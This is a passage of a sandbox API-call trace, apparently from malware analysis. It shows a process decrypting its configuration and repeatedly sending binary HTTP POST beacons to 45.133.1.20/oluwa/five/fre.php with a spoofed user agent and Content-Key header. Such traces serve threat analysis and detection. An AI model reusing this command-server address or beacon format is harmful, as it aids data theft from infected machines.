(HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0174.107] GetProcessHeap () returned 0x6a0000 [0174.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0174.107] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0174.108] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0174.109] GetProcessHeap () returned 0x6a0000 [0174.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0174.109] GetProcessHeap () returned 0x6a0000 [0174.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0174.110] send (s=0x378, buf=0x6bbd20*, len=242, flags=0) returned 242 [0174.111] send (s=0x378, buf=0x6bb998*, len=159, flags=0) returned 159 [0174.111] GetProcessHeap () returned 0x6a0000 [0174.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0174.111] recv (in: s=0x378, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0174.203] GetProcessHeap () returned 0x6a0000 [0174.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0174.204] GetProcessHeap () returned 0x6a0000 [0174.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0174.204] GetProcessHeap () returned 0x6a0000 [0174.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0174.205] GetProcessHeap () returned 0x6a0000 [0174.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0174.205] closesocket (s=0x378) returned 0 [0174.207] GetProcessHeap () returned 0x6a0000 [0174.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0174.208] GetProcessHeap () returned 0x6a0000 [0174.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0174.208] GetProcessHeap () returned 0x6a0000 [0174.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0174.208] GetProcessHeap () returned 0x6a0000 [0174.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0174.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13a4) returned 0x378 [0174.228] Sleep (dwMilliseconds=0xea60) [0174.231] GetProcessHeap () returned 0x6a0000 [0174.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0174.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.235] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.254] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0174.263] GetProcessHeap () returned 0x6a0000 [0174.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0174.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.264] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0174.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.265] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.267] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.267] GetProcessHeap () returned 0x6a0000 [0174.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0174.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.268] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0174.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.269] CryptDestroyKey (hKey=0x6ad560) returned 1 [0174.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.270] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0174.270] GetProcessHeap () returned 0x6a0000 [0174.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0174.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.271] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0174.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.272] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0174.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.273] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0174.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.274] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0174.274] GetProcessHeap () returned 0x6a0000 [0174.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0174.274] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0174.275] GetProcessHeap () returned 0x6a0000 [0174.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0174.275] GetProcessHeap () returned 0x6a0000 [0174.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0174.275] GetProcessHeap () returned 0x6a0000 [0174.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0174.276] GetProcessHeap () returned 0x6a0000 [0174.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0174.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.277] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0174.292] GetProcessHeap () returned 0x6a0000 [0174.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0174.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.293] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0174.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.294] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.295] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.295] GetProcessHeap () returned 0x6a0000 [0174.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0174.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.297] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0174.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.298] CryptDestroyKey (hKey=0x6ad020) returned 1 [0174.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.298] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0174.298] GetProcessHeap () returned 0x6a0000 [0174.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0174.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.302] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0174.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.303] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0174.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.304] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0174.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.305] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0174.305] GetProcessHeap () returned 0x6a0000 [0174.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0174.305] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9cf8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0174.305] GetProcessHeap () returned 0x6a0000 [0174.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0174.305] socket (af=2, type=1, protocol=6) returned 0x37c [0174.306] connect (s=0x37c, name=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0174.332] FreeAddrInfoW (pAddrInfo=0x6b9cf8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0174.332] GetProcessHeap () returned 0x6a0000 [0174.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0174.333] GetProcessHeap () returned 0x6a0000 [0174.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0174.333] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0174.334] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0174.334] GetProcessHeap () returned 0x6a0000 [0174.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0174.334] GetProcessHeap () returned 0x6a0000 [0174.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0174.335] GetProcessHeap () returned 0x6a0000 [0174.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0174.335] GetProcessHeap () returned 0x6a0000 [0174.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0174.336] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0174.336] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0174.336] GetProcessHeap () returned 0x6a0000 [0174.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0174.336] GetProcessHeap () returned 0x6a0000 [0174.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0174.337] send (s=0x37c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0174.338] send (s=0x37c, buf=0x6bb998*, len=159, flags=0) returned 159 [0174.338] GetProcessHeap () returned 0x6a0000 [0174.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0174.338] recv (in: s=0x37c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0174.408] GetProcessHeap () returned 0x6a0000 [0174.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0174.409] GetProcessHeap () returned 0x6a0000 [0174.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0174.409] GetProcessHeap () returned 0x6a0000 [0174.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0174.410] GetProcessHeap () returned 0x6a0000 [0174.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0174.411] closesocket (s=0x37c) returned 0 [0174.411] GetProcessHeap () returned 0x6a0000 [0174.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0174.411] GetProcessHeap () returned 0x6a0000 [0174.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0174.412] GetProcessHeap () returned 0x6a0000 [0174.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0174.412] GetProcessHeap () returned 0x6a0000 [0174.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0174.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12f8) returned 0x37c [0174.415] Sleep (dwMilliseconds=0xea60) [0174.416] GetProcessHeap () returned 0x6a0000 [0174.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0174.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.465] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0174.541] GetProcessHeap () returned 0x6a0000 [0174.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6ba8 [0174.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.542] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b6ba8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0174.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.544] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.547] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.547] GetProcessHeap () returned 0x6a0000 [0174.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ba8 | out: hHeap=0x6a0000) returned 1 [0174.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.549] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0174.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.551] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0174.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.552] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0174.552] GetProcessHeap () returned 0x6a0000 [0174.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0174.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.554] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0174.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.555] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0174.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.558] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0174.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.559] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0174.559] GetProcessHeap () returned 0x6a0000 [0174.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0174.559] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0174.559] GetProcessHeap () returned 0x6a0000 [0174.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0174.560] GetProcessHeap () returned 0x6a0000 [0174.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0174.560] GetProcessHeap () returned 0x6a0000 [0174.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0174.561] GetProcessHeap () returned 0x6a0000 [0174.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0174.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.562] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0174.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.571] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0174.650] GetProcessHeap () returned 0x6a0000 [0174.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0174.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.651] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0174.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.653] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0174.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.654] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.654] GetProcessHeap () returned 0x6a0000 [0174.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0174.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.657] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0174.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.658] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0174.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0174.659] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0174.659] GetProcessHeap () returned 0x6a0000 [0174.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0174.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.661] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0174.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.674] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0174.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.676] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0174.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0174.682] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0174.682] GetProcessHeap () returned 0x6a0000 [0174.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0174.682] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9960*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be910*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0174.682] GetProcessHeap () returned 0x6a0000 [0174.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0174.682] socket (af=2, type=1, protocol=6) returned 0x380 [0174.682] connect (s=0x380, name=0x6be910*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0174.713] FreeAddrInfoW (pAddrInfo=0x6b9960*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be910*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0174.713] GetProcessHeap () returned 0x6a0000 [0174.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0174.713] GetProcessHeap () returned 0x6a0000 [0174.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0174.714] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0174.715] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0174.715] GetProcessHeap () returned 0x6a0000 [0174.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0174.715] GetProcessHeap () returned 0x6a0000 [0174.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0174.716] GetProcessHeap () returned 0x6a0000 [0174.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0174.716] GetProcessHeap () returned 0x6a0000 [0174.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0174.717] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0174.718] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0174.718] GetProcessHeap () returned 0x6a0000 [0174.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0174.718] GetProcessHeap () 